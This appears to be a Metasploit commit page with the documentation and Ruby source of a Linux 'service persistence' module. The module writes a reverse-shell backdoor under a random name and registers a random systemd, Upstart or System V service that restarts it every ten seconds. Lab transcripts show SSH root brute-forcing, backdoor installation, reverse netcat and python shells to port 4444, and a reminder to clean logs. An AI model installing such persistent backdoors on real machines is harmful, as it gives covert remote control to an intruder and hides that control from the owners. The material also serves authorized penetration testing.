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Land #7012, Linux service persistence module

bug/bundler_fix
William Vu 2016-08-17 22:45:35 -05:00
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### Creating A Testing Environment
This module has been tested against:
1. Kali 2.0 (System V)
2. Ubuntu 14.04 (Upstart)
3. Ubuntu 16.04 (systemd)
4. Centos 5 (System V)
5. Fedora 18 (systemd)
6. Fedora 20 (systemd)
## Verification Steps
1. Start msfconsole
2. Exploit a box via whatever method
3. Do: `use exploit/linux/local/service_persistence`
4. Do: `set session #`
5. Do: `set verbose true`
6. Do: `set payload cmd/unix/reverse_python` or `payload cmd/unix/reverse_netcat` depending on system.
7. Optional Do: `set SHELLAPTH /bin` if needed for compatibility on remote system.
8. Do: `set lhost`
9. Do: `exploit`
10. Do: `use exploit/multi/handler`
11. Do: `set payload cmd/unix/reverse_python` or `payload cmd/unix/reverse_netcat` depending on system.
12. Do: `set lhost`
13. Do: `exploit -j`
14. Kill your shell (if System V, reboot target). Upstart/systemd wait 10sec
15. Get Shell
## Options
**target**
There are several targets selectable, which all have their own issues.
0. Automatic: Detect the service handler automatically based on running `which` to find the admin binaries
1. System V: There is no automated restart, so while you'll get a shell, if it crashes, you'll need to wait for a init shift to restart the process automatically (like a reboot). This logs to syslog or /var/log/<process>.log and .err
2. Upstart: Logs to its own file. This module is set to restart the shell after a 10sec pause, and do this forever.
3. systemd: This module is set to restart the shell after a 10sec pause, and do this forever.
**SHELLPATH**
If you need to change the location where the backdoor is written (like on CentOS 5), it can be done here. Default is /usr/local/bin
**SERVICE**
The name of the service to create. If not chosen, a 7 character random one is created.
**SHELL_NAME**
The name of the file to write with our shell. If not chosen, a 5 character random one is created.
## Scenarios
### System V (Centos 5 - root - chkconfig)
Get initial access
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.199.131
rhosts => 192.168.199.131
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set password centos
password => centos
msf auxiliary(ssh_login) > exploit
[*] 192.168.199.131:22 SSH - Starting bruteforce
[+] 192.168.199.131:22 SSH - Success: 'root:centos' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh Linux localhost.localdomain 2.6.18-398.el5 #1 SMP Tue Sep 16 20:51:48 EDT 2014 i686 i686 i386 GNU/Linux '
[*] Command shell session 1 opened (192.168.199.128:49359 -> 192.168.199.131:22) at 2016-06-22 14:27:38 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Install our callback service (system_v w/ chkconfig). Note we change SHELLPATH since /usr/local/bin isnt in the path for CentOS 5 services.
msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence
msf exploit(service_persistence) > set session 1
session => 1
msf exploit(service_persistence) > set verbose true
verbose => true
msf exploit(service_persistence) > set SHELLPATH /bin
SHELLPATH => /bin
msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf exploit(service_persistence) > set lhost 192.168.199.128
lhost => 192.168.199.128
msf exploit(service_persistence) > exploit
[*] Started reverse handler on 192.168.199.128:4444
[*] Writing backdoor to /bin/GUIJc
[*] Max line length is 65537
[*] Writing 95 bytes in 1 chunks of 329 bytes (octal-encoded), using printf
[*] Utilizing System_V
[*] Utilizing chkconfig
[*] Writing service: /etc/init.d/HqdezBF
[*] Max line length is 65537
[*] Writing 1825 bytes in 1 chunks of 6409 bytes (octal-encoded), using printf
[*] Enabling & starting our service
[*] Command shell session 2 opened (192.168.199.128:4444 -> 192.168.199.131:56182) at 2016-06-22 14:27:50 -0400
Reboot the box to prove persistence
reboot
^Z
Background session 2? [y/N] y
msf exploit(service_persistence) > use exploit/multi/handler
msf exploit(handler) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf exploit(handler) > set lhost 192.168.199.128
lhost => 192.168.199.128
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.199.128:4444
[*] Starting the payload handler...
[*] Command shell session 3 opened (192.168.199.128:4444 -> 192.168.199.131:44744) at 2016-06-22 14:29:32 -0400
### Upstart (Ubuntu 14.04.4 Server - root)
Of note, I allowed Root login via SSH w/ password only to gain easy initial access
Get initial access
msf auxiliary(ssh_login) > exploit
[*] 10.10.60.175:22 SSH - Starting bruteforce
[+] 10.10.60.175:22 SSH - Success: 'root:ubuntu' 'uid=0(root) gid=0(root) groups=0(root) Linux ubuntu 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:27 UTC 2016 i686 i686 i686 GNU/Linux '
[*] Command shell session 1 opened (10.10.60.168:43945 -> 10.10.60.175:22) at 2016-06-22 08:03:15 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Install our callback service (Upstart)
msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence
msf exploit(service_persistence) > set session 1
session => 1
msf exploit(service_persistence) > set verbose true
verbose => true
msf exploit(service_persistence) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf exploit(service_persistence) > set lhost 10.10.60.168
lhost => 10.10.60.168
msf exploit(service_persistence) > exploit
[*] Started reverse handler on 10.10.60.168:4444
[*] Writing backdoor to /usr/local/bin/bmmjv
[*] Max line length is 65537
[*] Writing 429 bytes in 1 chunks of 1650 bytes (octal-encoded), using printf
[*] Utilizing Upstart
[*] Writing /etc/init/Hipnufl.conf
[*] Max line length is 65537
[*] Writing 236 bytes in 1 chunks of 874 bytes (octal-encoded), using printf
[*] Starting service
[*] Dont forget to clean logs: /var/log/upstart/Hipnufl.log
[*] Command shell session 5 opened (10.10.60.168:4444 -> 10.10.60.175:44368) at 2016-06-22 08:23:46 -0400
And now, we can kill the callback shell from our previous session
^Z
Background session 5? [y/N] y
msf exploit(service_persistence) > sessions -i 1
[*] Starting interaction with 1...
netstat -antp | grep 4444
tcp 0 0 10.10.60.175:44368 10.10.60.168:4444 ESTABLISHED 1783/bash
tcp 0 0 10.10.60.175:44370 10.10.60.168:4444 ESTABLISHED 1789/python
kill 1783
[*] 10.10.60.175 - Command shell session 5 closed. Reason: Died from EOFError
kill 1789
Now with a multi handler, we can catch Upstart restarting the process every 10sec
msf > use exploit/multi/handler
msf exploit(handler) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf exploit(handler) > set lhost 10.10.60.168
lhost => 10.10.60.168
msf exploit(handler) > exploit
[*] Started reverse handler on 10.10.60.168:4444
[*] Starting the payload handler...
[*] Command shell session 3 opened (10.10.60.168:4444 -> 10.10.60.175:44390) at 2016-06-22 08:26:48 -0400
### systemd (Ubuntu 16.04 Server - root)
Ubuntu 16.04 doesn't have many of the default shell options, however `cmd/unix/reverse_netcat` works.
While python shellcode works on previous sytems, on 16.04 the path is `python3`, and therefore `python` will fail the shellcode.
Get initial access
msf exploit(handler) > use exploit/linux/local/service_persistence
msf exploit(service_persistence) > set session 1
session => 1
msf exploit(service_persistence) > set verbose true
verbose => true
msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf exploit(service_persistence) > set lhost 192.168.199.128
lhost => 192.168.199.128
msf exploit(service_persistence) > exploit
[*] Started reverse handler on 192.168.199.128:4444
[*] Writing backdoor to /usr/local/bin/JSRCF
[*] Max line length is 65537
[*] Writing 103 bytes in 1 chunks of 361 bytes (octal-encoded), using printf
[*] Utilizing systemd
[*] /lib/systemd/system/YelHpCx.service
[*] Max line length is 65537
[*] Writing 151 bytes in 1 chunks of 579 bytes (octal-encoded), using printf
[*] Enabling service
[*] Starting service
[*] Command shell session 7 opened (192.168.199.128:4444 -> 192.168.199.130:47050) at 2016-06-22 10:35:07 -0400
^Z
Background session 7? [y/N] y
Kill the process on the Ubuntu target box via local access #good_admin
root@ubuntu:/etc/systemd/system/multi-user.target.wants# netstat -antp | grep 4444
tcp 0 0 192.168.199.130:47052 192.168.199.128:4444 ESTABLISHED 5632/nc
root@ubuntu:/etc/systemd/system/multi-user.target.wants# kill 5632
And logically, we lose our shell
[*] 192.168.199.130 - Command shell session 7 closed. Reason: Died from EOFError
Now with a multi handler, we can catch systemd restarting the process every 10sec
msf exploit(service_persistence) > use exploit/multi/handler
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.199.128 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.199.128:4444
[*] Starting the payload handler...
[*] Command shell session 8 opened (192.168.199.128:4444 -> 192.168.199.130:47056) at 2016-06-22 10:37:30 -0400

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##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Unix
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Service Persistence',
'Description' => %q(
This module will create a service on the box, and mark it for auto-restart.
We need enough access to write service files and potentially restart services
Targets:
System V:
CentOS <= 5
Debian <= 6
Kali 2.0
Ubuntu <= 9.04
Upstart:
CentOS 6
Fedora >= 9, < 15
Ubuntu >= 9.10, <= 14.10
systemd:
CentOS 7
Debian >= 7, <=8
Fedora >= 15
Ubuntu >= 15.04
Note: System V won't restart the service if it dies, only an init change (reboot etc) will restart it.
),
'License' => MSF_LICENSE,
'Author' =>
[
'h00die <mike@shorebreaksecurity.com>'
],
'Platform' => ['unix', 'linux'],
'Targets' =>
[
['Auto', {}],
['System V', { :runlevel => '2 3 4 5' }],
['Upstart', { :runlevel => '2345' }],
['systemd', {}]
],
'DefaultTarget' => 0,
'Arch' => ARCH_CMD,
'References' =>
[
['URL', 'https://www.digitalocean.com/community/tutorials/how-to-configure-a-linux-service-to-start-automatically-after-a-crash-or-reboot-part-1-practical-examples']
],
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'python netcat' # we need non-threaded/forked so the systems properly detect the service going down
}
},
'DefaultOptions' =>
{
'WfsDelay' => 5
},
'DisclosureDate' => 'Jan 1 1983', # system v release date
)
)
register_options(
[
OptPath.new('SHELLPATH', [true, 'Writable path to put our shell', '/usr/local/bin']),
OptString.new('SHELL_NAME', [false, 'Name of shell file to write']),
OptString.new('SERVICE', [false, 'Name of service to create'])
], self.class
)
end
def exploit
backdoor = write_shell(datastore['SHELLPATH'])
path = backdoor.split('/')[0...-1].join('/')
file = backdoor.split('/')[-1]
case target.name
when 'System V'
system_v(path, file, target.opts[:runlevel], service_system_exists?('update-rc.d'))
when 'Upstart'
upstart(path, file, target.opts[:runlevel])
when 'systemd'
systemd(path, file)
else
if service_system_exists?('systemctl')
print_status('Utilizing systemd')
systemd(path, file)
end
if service_system_exists?('initctl')
print_status('Utilizing Upstart')
upstart(path, file, '2345')
end
has_updatercd = service_system_exists?('update-rc.d')
if has_updatercd || service_system_exists?('chkconfig') # centos 5
print_status('Utilizing System_V')
system_v(path, file, '2 3 4 5', has_updatercd)
else
print_error('Unable to detect service system')
register_file_for_cleanup(backdoor)
end
end
end
def service_system_exists?(command)
service_cmd = cmd_exec("which #{command}")
!(service_cmd.empty? || service_cmd.include?('no'))
end
def write_shell(path)
file_name = datastore['SHELL_NAME'] ? datastore['SHELL_NAME'] : Rex::Text.rand_text_alpha(5)
backdoor = "#{path}/#{file_name}"
vprint_status("Writing backdoor to #{backdoor}")
write_file(backdoor, payload.encoded)
cmd_exec("chmod 711 #{backdoor}")
backdoor
end
def systemd(backdoor_path, backdoor_file)
# https://coreos.com/docs/launching-containers/launching/getting-started-with-systemd/
script = %{[Unit]
Description=Start daemon at boot time
After=
Requires=
[Service]
RestartSec=10s
Restart=always
TimeoutStartSec=5
ExecStart=/bin/sh #{backdoor_path}/#{backdoor_file}
[Install]
WantedBy=multi-user.target}
service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
vprint_status("Writing service: /lib/systemd/system/#{service_filename}.service")
write_file("/lib/systemd/system/#{service_filename}.service", script)
vprint_status('Enabling service')
cmd_exec("systemctl enable #{service_filename}.service")
vprint_status('Starting service')
cmd_exec("systemctl start #{service_filename}.service")
end
def upstart(backdoor_path, backdoor_file, runlevel)
# http://blog.terminal.com/getting-started-with-upstart/
script = %{description \"Start daemon at boot time\"
start on filesystem or runlevel [#{runlevel}]
stop on shutdown
script
cd #{backdoor_path}
echo $$ > /var/run/#{backdoor_file}.pid
exec #{backdoor_file}
end script
post-stop exec sleep 10
respawn
respawn limit unlimited}
service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
vprint_status("Writing service: /etc/init/#{service_filename}.conf")
write_file("/etc/init/#{service_filename}.conf", script)
vprint_status('Starting service')
cmd_exec("initctl start #{service_filename}")
vprint_status("Dont forget to clean logs: /var/log/upstart/#{service_filename}.log")
end
def system_v(backdoor_path, backdoor_file, runlevel, has_updatercd)
if has_updatercd
print_status('Utilizing update-rc.d')
else
print_status('Utilizing chkconfig')
end
script = %{#!/bin/sh
### BEGIN INIT INFO
# Provides: service
# Required-Start: $network
# Required-Stop: $network
# Default-Start: #{runlevel}
# Default-Stop: 0 1 6
# Short-Description: Start daemon at boot time
# Description: Enable service provided by daemon.
### END INIT INFO
dir=\"#{backdoor_path}\"
cmd=\"#{backdoor_file}\"
name=`basename $0`
pid_file=\"/var/run/$name.pid\"
stdout_log=\"/var/log/$name.log\"
stderr_log=\"/var/log/$name.err\"
get_pid() {
cat \"$pid_file\"
}
is_running() {
[ -f \"$pid_file\" ] && ps `get_pid` > /dev/null 2>&1
}
case \"$1\" in
start)
if is_running; then
echo \"Already started\"
else
echo \"Starting $name\"
cd \"$dir\"}
if has_updatercd
script << " sudo $cmd >> \"$stdout_log\" 2>> \"$stderr_log\" &\n"
else # CentOS didn't like sudo or su...
script << " $cmd >> \"$stdout_log\" 2>> \"$stderr_log\" &\n"
end
script << %{ echo $! > \"$pid_file\"
if ! is_running; then
echo \"Unable to start, see $stdout_log and $stderr_log\"
exit 1
fi
fi
;;
stop)
if is_running; then
echo -n \"Stopping $name..\"
kill `get_pid`
for i in {1..10}
do
if ! is_running; then
break
fi
echo -n \".\"
sleep 1
done
echo
if is_running; then
echo \"Not stopped; may still be shutting down or shutdown may have failed\"
exit 1
else
echo \"Stopped\"
if [ -f \"$pid_file\" ]; then
rm \"$pid_file\"
fi
fi
else
echo \"Not running\"
fi
;;
restart)
$0 stop
if is_running; then
echo \"Unable to stop, will not attempt to start\"
exit 1
fi
$0 start
;;
status)
if is_running; then
echo \"Running\"
else
echo \"Stopped\"
exit 1
fi
;;
*)
echo \"Usage: $0 {start|stop|restart|status}\"
exit 1
;;
esac
exit 0}
service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
vprint_status("Writing service: /etc/init.d/#{service_filename}")
write_file("/etc/init.d/#{service_filename}", script)
cmd_exec("chmod 755 /etc/init.d/#{service_filename}")
vprint_status('Enabling & starting our service')
if has_updatercd
cmd_exec("update-rc.d #{service_filename} defaults")
cmd_exec("update-rc.d #{service_filename} enable")
cmd_exec("service #{service_filename} start")
else # CentOS
cmd_exec("chkconfig --add #{service_filename}")
cmd_exec("chkconfig #{service_filename} on")
cmd_exec("/etc/init.d/#{service_filename} start")
end
end
end